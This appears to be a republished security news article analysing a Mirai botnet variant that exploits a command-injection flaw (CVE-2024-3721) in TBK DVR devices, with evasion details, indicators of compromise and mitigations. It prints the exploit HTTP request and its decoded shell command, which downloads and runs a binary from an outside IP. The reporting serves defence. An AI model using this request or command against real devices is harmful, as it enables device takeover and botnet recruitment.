New Mirai Variant Exploits TBK DVR Flaw for Remote Code Execution

New Mirai Variant Exploits TBK DVR Flaw for Remote Code Execution

The latest wave of Mirai botnet activity has resurfaced with a refined attack chain exploiting CVE-2024-3721, a critical command injection vulnerability in TBK DVR-4104 and DVR-4216 devices.

This campaign leverages unpatched firmware to deploy a modified Mirai variant designed for IoT device hijacking and DDoS operations.

Exploitation Vector & Payload Delivery

Attackers exploit the vulnerability via crafted HTTP POST requests targeting the /device.rsp endpoint.

– Advertisement –

The injected command downloads and executes an ARM32 binary:

textPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1

The decoded shell script executes:

bashcd /tmp; rm arm7; wget http://42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk

This streamlined payload skips architecture reconnaissance, specifically targeting ARM32-based DVR systems.

Malware Modifications & Evasion Tactics

The Mirai variant incorporates several upgrades:

1. RC4 String Encryption

  • Uses XOR-encrypted RC4 key: 6e7976666525a97639777d2d7f303177
  • Decrypted strings stored in a custom DataDecrypted structure for runtime access

2. Anti-Analysis Checks

  • Scans /proc/[PID]/cmdline for VMware/QEMU indicators
  • Validates execution path against hardcoded directories: text/dev/shm /tmp /var/run

3. Process Whitelisting
Terminates competing malware processes like Hajime, Anarchy, and Mozi to monopolize device resources.

Infection Metrics & Mitigation

Telemetry data reveals concentrated infections in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil.

Over 50,000 exposed DVR devices remain vulnerable globally, with attackers actively scanning Shodan-listed targets.

Mitigation Strategy Implementation
Firmware Patching Apply TBK’s 20240412+ updates
Network Segmentation Isolate DVRs from critical infrastructure
Input Sanitization Block special characters in mdb/mdc parameters

Kaspersky products detect this variant as HEUR:Backdoor.Linux.Mirai and HEUR:Backdoor.Linux.Gafgyt.

Device owners should prioritize firmware updates and consider factory resets for compromised units.

Indicators of Compromise

textIPs: 116.203.104[.]203, 130.61.64[.]122, 161.97.219[.]84  
MD5: 011a406e89e603e93640b10325ebbdc8, 24fd043f9175680d0c061b28a2801dfc

This campaign underscores the persistent threat of legacy IoT vulnerabilities in industrial surveillance systems.

The Mirai codebase’s continued evolution demonstrates threat actors’ ability to weaponize decade-old malware through strategic modifications.

To Upgrade Your Cybersecurity Skills, Take Diamond Membership With 150+ Practical Cybersecurity Courses Online – Enroll Here


Source link